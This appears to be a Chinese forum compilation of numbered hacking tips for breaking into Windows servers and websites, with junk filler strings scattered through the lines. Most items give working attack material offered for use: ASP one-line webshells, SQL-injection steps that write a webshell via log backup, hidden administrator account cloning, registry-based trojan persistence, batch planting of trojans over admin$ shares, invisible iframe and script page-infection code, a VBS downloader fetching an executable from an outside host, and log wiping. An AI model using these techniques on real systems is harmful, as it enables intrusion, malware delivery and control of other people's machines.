Xp系统修改权限防止病毒或木马等破坏系统,cmd下,- T5 S" D, ?) i6 j8 M
cacls C:\windows\system32 /G hqw20:R7 b3 N) v0 y2 {
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入! L8 ?- q7 _6 E- p( L
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
2 O' N e) M. ` R7 w6 {0 o
3 I) H( r' K' z, U! L a2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
- ]+ y5 W& f5 Q6 ]( S8 p& T0 f8 T- ~+ v. ~0 S
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。( s* q( W: x! R9 l& h+ ^: m& H
; y* Q3 O( S0 ?& h- K+ B4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
' a: \& b; o7 P) ~/ u b2 e: ~+ P8 s" N/ s$ ?
5、利用INF文件来修改注册表
2 h1 z' @1 E( l! `[Version]
) A: J- t! ^, @+ b; @/ LSignature="$CHICAGO$"1 R* }% ~% s2 Y) n( g9 h
[Defaultinstall]1 W& G3 B+ { I2 Z4 z( Z
addREG=Ating
% F" g; S1 `1 ]8 f[Ating]
/ l1 R6 `' V8 g q2 m& H/ r, m4 SHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"; u4 I% ]- E. x+ G q: g
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:* M/ n3 k. t+ b
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
2 f t0 D' b2 E& k% V, g& a其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU- X! [- O3 `* f
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU% X7 `0 @$ r( \1 L
HKEY_CURRENT_CONFIG 简写为 HKCC4 r! e; a, E9 Y v5 A
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值" o+ ^3 h/ X/ r8 x- T- o* w
"1"这里代表是写入或删除注册表键值中的具体数据* ]8 o' g- b: [! U& C' [+ B0 k
% `, p2 L$ N" n( C& h; {6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,* q! V9 E+ l- k# l' E
多了一步就是在防火墙里添加个端口,然后导出其键值) ]: n4 b" T" ^3 c
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
: G! k/ \3 w0 N; {; B
5 L/ }! x$ r7 |* m: |/ M7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽/ u& w1 z, U. C; J0 g* I
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。8 I m0 _: q! `: T |/ Z5 C/ ^( r
( N6 [1 u& N$ n9 ~8 F0 [/ [
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
, q4 O% {8 t" E% _3 X
9 ?% Z B A% U( h+ t2 t( a8 T9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,& i- D6 E/ S$ i: ?9 v
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
, i$ E8 P3 K- _, z. q/ V0 i, n- r7 }- @
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
7 R) s# |, T8 N2 d2 w3 \. T, h6 D2 X" w9 p' q4 r) @$ j
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
" a; C, l2 ]5 [7 E3 h' t" W k用法:xsniff –pass –hide –log pass.txt
" t* T: p, p* B9 n( t7 [: k- E, I$ B/ t, u- M% R
12、google搜索的艺术1 a4 w! K6 p# b* [
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”* e# n6 Y: R$ F0 P! J. n% R* O
或“字符串的语法错误”可以找到很多sql注入漏洞。: ?( D8 f1 B( p- U" S" ?" {
6 h( s. t- T& m- e) x' d/ ?# L
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
+ N9 k7 y/ s, Z: v+ \" z3 E6 R. P& R* M: H. b1 |! N4 i0 {
14、cmd中输入 nc –vv –l –p 1987
9 q- e$ D/ m. {) ?7 T: @' t) @做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃; S; f( W- V. v1 q4 Z3 I* @
0 e- g: o0 Q0 x
15、制作T++木马,先写个ating.hta文件,内容为* J1 J# O, ^) q* S/ s5 v: y6 l
<script language="VBScript">7 _) S; p' b4 |
set wshshell=createobject ("wscript.shell" )
\' J5 l: ^3 La=wshshell.run("你马的名称",1)
3 Y) l7 C" d4 Q K9 ]8 h' cwindow.close
. Y; g- E* q8 R</script>
& F- V; L) z$ b+ g6 }9 e: v再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。2 @# Y/ I; t4 M, w a
/ h0 C( O. R; A5 k) E0 f3 N
16、搜索栏里输入1 _1 [9 W- ]5 A( r
关键字%'and 1=1 and '%'=': c4 @) E, l- G; h4 H
关键字%'and 1=2 and '%'='
3 R7 d% N1 ?; ~: r$ r/ N# F比较不同处 可以作为注入的特征字符
- ]: Z2 I* V9 A8 m
9 {0 D' [9 r1 P17、挂马代码<html>
/ o: j, v1 Y$ S/ u% h- ~<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>2 [2 D* i/ a/ t7 j0 r4 G
</html>
2 P+ v* S, N* N, e4 T8 e$ N$ J& ?
' |$ s8 ]6 j( P: Y0 Y5 v% Z18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,% j7 ~) E4 g0 v2 }3 i: m! L8 u$ }; v/ u
net localgroup administrators还是可以看出Guest是管理员来。/ P: I6 ~, m* ~* c6 n5 E
! C' m7 }' t, }" k1 C/ g! z; ^' B2 _( ?. h19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等3 R: T% |; F4 s$ x' ?; L
用法: 安装: instsrv.exe 服务名称 路径
K5 H& j/ v' t# {卸载: instsrv.exe 服务名称 REMOVE
r. z; l/ x9 y" q6 p7 B9 t5 t/ i2 @
/ z# |5 R. ~/ d# Z5 f4 ?- ]: T9 b; }, R, a A r2 i
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
* `! A7 A0 w$ n$ }5 R! I2 ?0 x不能注入时要第一时间想到%5c暴库。0 C; j* G2 l1 y4 U0 ^
5 D4 P. v0 |" B6 l; o1 {/ X5 u
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
5 f L7 v) n6 b: H" R5 ?$ b* [; N5 K; @
23、缺少xp_cmdshell时
6 G# r# V- [7 J% O1 O$ ~7 |8 m$ x尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'4 y7 E* ?0 q* r1 P$ J+ h
假如恢复不成功,可以尝试直接加用户(针对开3389的)
" ^; J7 L2 m: N2 s' n7 B, ydeclare @o int; K' T7 l9 F2 S3 G* {1 b
exec sp_oacreate 'wscript.shell',@o out
; }# Y, t3 u, a8 w7 ^7 |exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员/ v; u+ H, {* Z/ M% ]+ [
! u9 F! t; z# N$ f9 I2 m# \24.批量种植木马.bat
0 ~0 i; x9 E% p) w' L$ ]; `, P4 n9 ]3 pfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中% r5 w0 P. W' T6 [9 u
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
. a5 ?& Y1 B3 A& [- ?# G( u扫描地址.txt里每个主机名一行 用\\开头
, X: V S( f; O q; X* c4 I0 j: Y s- o
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
; H9 m8 P3 w# ?3 z* m% k% B! n- a+ h h) B$ \9 v
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
: }# _, v) {7 l5 E3 c$ U+ f* b4 R将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.! E: b/ Z+ f4 Q0 w
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马/ }% j2 R1 L9 `7 @* N9 v
( R; d6 i# L) k* W+ R27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP, @ Y; s0 ~/ N1 [
然后用#clear logg和#clear line vty *删除日志8 T: p0 X5 t; R
% c. K( h3 M1 w/ U' U2 i28、电脑坏了省去重新安装系统的方法/ r2 |% W5 Q2 M& o& i0 T3 ^" e3 T
纯dos下执行,
# p) f+ L/ w0 T6 `xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
& O- G3 S& z# b7 Z$ F2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
( K4 v4 J- V6 G. G9 _2 e7 {3 Z
- I0 w9 v! Y4 D, n T29、解决TCP/IP筛选 在注册表里有三处,分别是:4 r3 X. }( s9 O3 b/ a2 T
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip, [: ~. {, `* I! }
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
# O6 R7 s$ w. S6 N: k6 gHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip) z7 g* E! W" E. K. R0 [, n
分别用" q4 A* w( ?8 _' E: l$ g) E
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip! S% k1 N/ g% M( D
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip+ h7 H) m7 g/ J+ \0 }* Q
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip/ ~$ d5 _5 P1 i0 n7 U4 H1 f
命令来导出注册表项
8 v1 Z% X: p7 _5 A+ e2 Q% q; |然后把三个文件里的EnableSecurityFilters"=dword:00000001,1 d: D# B8 H4 f* z! I1 N) B9 S
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
' K6 [) C) g8 jregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
% p% U' d) n+ }
+ a2 O+ Z1 E2 T5 O: U- J6 ]! k. O+ _& `30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
2 S8 E5 h- d- A2 t1 ?; SSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
: a9 L% n2 U: f3 ~" Z8 n7 D/ _; E; H* H6 J
31、全手工打造开3389工具
4 l6 n$ F) g9 K+ ~( g$ E2 \打开记事本,编辑内容如下:# H$ D4 [6 D- q1 F+ H2 I
echo [Components] > c:\sql0 ?- N7 k! V! ?
echo TSEnable = on >> c:\sql
, |+ @) C; f3 h7 z' Vsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q8 [1 f/ _- o- j9 r$ D+ v
编辑好后存为BAT文件,上传至肉鸡,执行( O9 Q0 R a/ |2 }; y) V8 o8 u1 m
m; r5 Q" p4 ?: |3 x2 W; w
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
# L$ Z' d* l3 G; Y# F3 M- {* a4 C" M2 M
33、让服务器重启! L( z& V. G! b
写个bat死循环:
! y/ P7 m' T, I1 C7 S7 p+ k6 ]@echo off' U+ `: J$ I8 l4 M7 i
:loop1, F" t* l: q- ]
cls% f+ \3 z5 C: u; C5 y1 M
start cmd.exe
" b" G6 \$ h5 V: lgoto loop1
5 H% p4 M0 S) I保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
8 f" |$ `: ~1 _
% u; i# K& A" W! W" B' w: O34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
- x- |- X6 r3 G1 g@echo off
4 T1 e* I0 F1 ^7 a4 jdate /t >c:/3389.txt% O. C' ?5 o8 f/ j
time /t >>c:/3389.txt% U" x. }& K! Q3 O) T
attrib +s +h c:/3389.bat
4 Y f2 \# O: a! a) ?attrib +s +h c:/3389.txt
4 H( G. \# F8 y/ L) xnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
6 O" e0 t2 g" }6 O# N( q0 w并保存为3389.bat/ ~& O1 t/ K" \' Y$ J
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号/ ]9 a2 I$ H4 ]/ d
: W+ j6 ~. h6 P" t35、有时候提不了权限的话,试试这个命令,在命令行里输入:
3 P2 [8 Q e0 ^0 A7 rstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)2 b8 [0 m0 s2 F
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
! r7 t) _/ w& ~* f9 s* ?" h; U9 P m* }8 A: G8 R9 Z$ l4 V
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
* Y" [3 Z0 j& J: A; r. b: M. xecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
: e! i. N' i4 G X+ qecho 你的FTP账号 >>c:\1.bat //输入账号2 W7 E! l% T0 H
echo 你的FTP密码 >>c:\1.bat //输入密码
1 r3 ~6 n2 B7 f l' b4 D4 Vecho bin >>c:\1.bat //登入
# p3 I3 s+ H' y. ]- w4 E- oecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
/ t) q- v5 k4 ~' h& ?9 ] U1 N, Cecho bye >>c:\1.bat //退出
+ w8 t' w0 k$ Y! b然后执行ftp -s:c:\1.bat即可4 U3 l" o# i2 Y3 h7 ~% y
! ~. y# p4 H5 f37、修改注册表开3389两法
1 ?) U. O$ u, m V0 L% B9 B6 X0 X(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表) \$ C5 W; Y+ F$ z2 }& b3 ^# a ]
echo Windows Registry Editor Version 5.00 >>3389.reg
" |1 M0 V7 c. p( D' Z. iecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
) L4 @2 o, }- N, b8 p# r9 Hecho "Enabled"="0" >>3389.reg
( x* \6 g7 S4 p5 Hecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
' `/ ^; V1 }( C( h! ZNT\CurrentVersion\Winlogon] >>3389.reg5 a* {. S! C" \2 P; {9 w
echo "ShutdownWithoutLogon"="0" >>3389.reg
- E5 O/ c# T) N$ f/ }4 y5 @echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]( H1 t+ R4 K7 m. K6 y& l- G
>>3389.reg1 ?; P2 P4 {1 _" p) W
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
3 `2 B: c* \; J) C& hecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
+ a+ B! e+ k+ Q( P8 R>>3389.reg
$ r- F% Z b. \0 k7 S. wecho "TSEnabled"=dword:00000001 >>3389.reg
2 O2 H9 D2 s2 l3 r5 F9 oecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg3 a0 [- M$ x* U8 c* a1 ?
echo "Start"=dword:00000002 >>3389.reg
9 d1 m# [* b' u; |echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]; _+ i9 ]/ n8 J& ^
>>3389.reg
8 g z1 Y& U7 Yecho "Start"=dword:00000002 >>3389.reg
4 g O3 f1 d0 R2 q) O7 _% i4 Yecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg) l! P& B3 r, s* i/ r f
echo "Hotkey"="1" >>3389.reg
" e, t3 z) d0 j# cecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
! u/ Y$ z$ r& r" T! l ]Server\Wds\rdpwd\Tds\tcp] >>3389.reg
p* F% |' O gecho "PortNumber"=dword:00000D3D >>3389.reg
+ H+ D, W2 R0 E8 Becho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal8 H* [7 y+ Y4 q" t+ U* |9 E
Server\WinStations\RDP-Tcp] >>3389.reg
2 A" O$ |0 [* _8 j) Eecho "PortNumber"=dword:00000D3D >>3389.reg. |5 a+ i. H, P T8 }! t
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
( e& {& C2 O, `3 r6 b(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
9 s3 j% _1 x* x( A2 k; T4 M; L$ g因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
* s; `8 R$ c- R1 C( V(2)winxp和win2003终端开启
3 M, @ C; U4 N* B! V用以下ECHO代码写一个REG文件:) S3 x: _4 l3 g0 K4 M4 L. a
echo Windows Registry Editor Version 5.00>>3389.reg
! k, ^; a: B* t* L0 Pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
6 `; O+ [. c a" VServer]>>3389.reg
, g) g, K$ A) \! i1 _+ decho "fDenyTSConnections"=dword:00000000>>3389.reg/ O. Z( }/ i5 i& z, u1 n, u/ F
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
6 t7 F2 P+ i9 ]; |" E5 L/ iServer\Wds\rdpwd\Tds\tcp]>>3389.reg! v( Y& }6 o6 u. T
echo "PortNumber"=dword:00000d3d>>3389.reg( N# e6 [ W! z( V* Q+ r
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
7 X! T* c, m1 |' K7 Y5 H6 jServer\WinStations\RDP-Tcp]>>3389.reg
: X9 J& I0 d& j6 Xecho "PortNumber"=dword:00000d3d>>3389.reg
+ @! t9 S5 B2 m1 U然后regedit /s 3389.reg del 3389.reg
' r; M6 e6 y2 Q# U8 u* oXP下不论开终端还是改终端端口都不需重启
$ I5 B L9 e. S( l
8 e, U: G0 p. h7 \) Z; B1 a7 V. L38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
2 @; ~) S9 \) F. a/ \" S) k6 v用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'5 k( d6 _* v* W: k& s
, J i# X0 h* L4 R7 O" G39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
% Y, p& X/ j& I2 M* C$ `6 g(1)数据库文件名应复杂并要有特殊字符
3 E, P; M, D$ M2 Q9 x0 u+ \(2)不要把数据库名称写在conn.asp里,要用ODBC数据源/ ?: C7 ^2 [5 z
将conn.asp文档中的 n8 e/ k# P3 U. z5 ]7 o
DBPath = Server.MapPath("数据库.mdb")3 P# |$ x" K8 Y. N/ ~! x
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
# X s8 h8 O; r5 J/ d( u2 d) m5 b9 N$ r- C8 \5 y- N+ r
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置. T2 @. [: [: V: x( v0 g
(3)不放在WEB目录里1 Y- D8 y! m: I, x# W) U
6 _; y1 Q, c" ]/ t. P6 n40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉6 J9 d. a% E, h5 S% M- Q: R
可以写两个bat文件, `9 p7 v- m! O6 F2 `
@echo off
( S$ ]2 t# x" |& G3 |) e@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
$ |- \0 _, \' x9 \' L@del c:\winnt\system32\query.exe* _$ z9 R$ r a% Z* g! c
@del %SYSTEMROOT%\system32\dllcache\query.exe
4 ?5 j% R/ l% f4 i& O7 P; {@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
$ l4 P# G0 ]/ m) r% g- C- \
) [* d7 u: r9 \8 D, Q@echo off
) |. }, J% c3 U" {6 v8 u0 ?@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
& z: I6 L5 C7 G@del c:\winnt\system32\tsadmin.exe
5 Y3 W: O& a+ [4 e- v@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex& a5 L2 i: N. W& ?/ f7 |6 p; G
+ m; E: f$ v6 f3 d4 n" @ O
41、映射对方盘符
, K7 N! Z- e: |) f- ]telnet到他的机器上, q* u" ^; H9 J$ L2 H, v7 c
net share 查看有没有默认共享 如果没有,那么就接着运行0 z- M d' ~) R9 t( M
net share c$=c:
8 F; v% z; h# ^# B+ G, X" Hnet share现在有c$
$ _, Y, a3 ~! |. R" S在自己的机器上运行) @9 f3 o [9 W: l; w. M/ u" h
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K. T+ I' e) @, _/ c( R
2 e- F5 ]2 k7 E/ a5 N42、一些很有用的老知识
* ?4 b7 x0 G8 Ntype c:\boot.ini ( 查看系统版本 )) K1 C8 K) j2 }
net start (查看已经启动的服务)& n' n" b$ j4 u" b( J
query user ( 查看当前终端连接 )
; x; }: d! u# c% L( knet user ( 查看当前用户 )5 c: H3 J6 z7 K
net user 用户 密码/add ( 建立账号 )0 N' t2 q+ ^; ?, r) P& k
net localgroup administrators 用户 /add (提升某用户为管理员)) ~9 I7 M0 R" n
ipconfig -all ( 查看IP什么的 ): N$ V) J# b5 B( }4 x
netstat -an ( 查看当前网络状态 )
! K9 D% V. T8 z1 Q3 f! Gfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
! l# S) ]" \$ ~+ j- Z0 o克隆时Administrator对应1F4 l% I. N! y& |3 m% t
guest对应1F5. t# m3 `3 U/ I: e* X2 L
tsinternetuser对应3E8
) c9 q2 w5 o( l2 x& F! H. \' S+ \2 o3 \( }1 y" _
43、如果对方没开3389,但是装了Remote Administrator Service
6 R: x9 y- ]. ~' F7 V用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
' _% L6 i) A {- G7 C) [+ D }解释:用serv-u漏洞导入自己配制好的radmin的注册表信息$ L! \- k, @5 a) y/ e$ F$ b* `
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
4 f9 t6 \& B* M: s, _5 R. v% q6 h s/ B1 R) i0 M
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
" ^! i' q7 ?: b+ @2 j: O本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)6 n2 E Z0 B2 D8 Q6 D* g
# i3 N/ s8 P4 \) q. \# k
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
5 A; }( \4 d, b' Qecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open- t1 f0 }9 r9 v* `" M+ T o- r
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =$ u( Y. ^! l- a7 C f/ k
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =3 }" `$ }7 \( Y& c A5 o
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
) z1 A# P4 m& Y* m; ^4 W- |) K(这是完整的一句话,其中没有换行符)$ l" @# Q6 i* z1 L' u; |
然后下载:, U% m' o5 L- V+ {* V. U
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
0 {' A' s' f7 G& Q4 ?
9 q7 P. f# v& f2 K46、一句话木马成功依赖于两个条件:
4 i, R4 V7 [1 J" e1、服务端没有禁止adodb.Stream或FSO组件# h- ^- L) U# G8 A2 ~
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。8 x8 V2 x/ X$ U) j8 Z7 a3 L
- p' B6 i! }9 T47、利用DB_OWNER权限进行手工备份一句话木马的代码:
* U+ @" K% x" ]/ @2 q4 }; V;alter database utsz set RECOVERY FULL--4 F; j, `+ {2 _' F' v% K% V
;create table cmd (a image)--
0 j5 y+ _5 h3 N) F9 ?. N T;backup log utsz to disk = 'D:\cmd' with init--
( [/ t4 a$ p* Y0 f: T$ F;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
" d% _+ C* v3 v$ r; a;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--( E5 c8 \1 H$ ~# M2 J
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
* C; @3 k$ x) j- E1 M5 H* F- h
# h& Y( ]6 D$ X# ?2 u- E" w48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
% T. D% F3 V+ s" b0 j# O/ G1 q9 c6 W
/ l, n3 {5 s) j! m7 j a# @$ l用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options( Z/ Z6 @+ Q: t5 ~7 A
所有会话用 'all'。" \% y( N3 ]' F1 d* ]! K
-s sessionid 列出会话的信息。
/ p. x- j" T6 t4 r; h-k sessionid 终止会话。# H/ M5 R5 R* r1 l
-m sessionid 发送消息到会话。
/ P, _( t0 X( }7 l- I1 X2 M
, D; B( D$ x) J" f) {1 tconfig 配置 telnet 服务器参数。" e: u" N! @2 z4 g* D: k* R/ j
0 |# r$ X7 z* L3 |+ x: I
common_options 为: P" F( K2 y( h% f ?9 c
-u user 指定要使用其凭据的用户0 C& r/ Z* V' ~- x7 J
-p password 用户密码' e O8 K9 @* b, l
5 k+ I3 O/ [3 z+ U9 Q" [) e
config_options 为:
) ?; n- G( g* }8 h* U z! Sdom = domain 设定用户的默认域3 \$ \) R9 _6 f# e. A# B
ctrlakeymap = yes|no 设定 ALT 键的映射 H D: i( l: d3 }6 N( j, f6 j
timeout = hh:mm:ss 设定空闲会话超时值
6 s3 O/ R4 H1 C6 ~7 `( ytimeoutactive = yes|no 启用空闲会话。2 _; G; ?4 ?+ A
maxfail = attempts 设定断开前失败的登录企图数。
( g7 K/ @6 {5 q+ |% o% R2 M/ {maxconn = connections 设定最大连接数。
8 o4 W* n. R9 e) R4 M; `port = number 设定 telnet 端口。4 u p/ @/ x; u k
sec = [+/-]NTLM [+/-]passwd+ ]6 ], {$ S. u* b& J
设定身份验证机构
( B0 I0 ]# c! r: @0 G# X* ~, P7 j! ffname = file 指定审计文件名。
4 c" L1 q- d. M: A- wfsize = size 指定审计文件的最大尺寸(MB)。
% t7 P; m, E' @9 M6 smode = console|stream 指定操作模式。
1 G% k: t, B7 \' Z1 {' [( F7 _auditlocation = eventlog|file|both% U3 X, s0 W1 \
指定记录地点" ~' @: Q' K; ~* o+ N; E) U1 _
audit = [+/-]user [+/-]fail [+/-]admin
. \: B* k1 @, w% P9 i. _
9 F$ J6 J5 H( m5 B49、例如:在IE上访问:+ S1 C8 p1 x; t$ I
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
7 ~! G: N8 e7 j( p7 _; Y' lhack.txt里面的代码是:
8 J, w1 ?' m/ s s. P<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">8 R9 g2 L, v9 F
把这个hack.txt发到你空间就可以了!
0 e8 X9 ]- `4 E2 d0 j这个可以利用来做网马哦!
. s- ]3 D" F! \# I/ w9 w( Y& h- m7 Q1 N* r
50、autorun的病毒可以通过手动限制!
( s4 ~3 y; Q a1 }+ J1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
2 ~ y$ s: \8 Q* ^& J2,打开盘符用右键打开!切忌双击盘符~
6 Y! E+ T4 F# d! p3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!/ D4 R* |% O7 Y
9 V- N: P5 L0 G# |; \51、log备份时的一句话木马:( o" N7 W6 p. G. s7 z# E: f
a).<%%25Execute(request("go"))%%25>
9 \ ?" w9 t; Y5 [( ^# e/ pb).<%Execute(request("go"))%>
9 `# W1 q2 j9 \% C6 fc).%><%execute request("go")%><%
6 ]7 {# F! E) p) P3 O/ k4 ~) Jd).<script language=VBScript runat=server>execute request("sb")</Script>
. X: {8 i, Y) [5 \8 Qe).<%25Execute(request("l"))%25>$ V+ A( C: L( W1 c, Y& B Y
f).<%if request("cmd")<>"" then execute request("pass")%>3 z2 G; I" u3 P0 Z. f S
, c6 ~3 U& g6 W
52、at "12:17" /interactive cmd
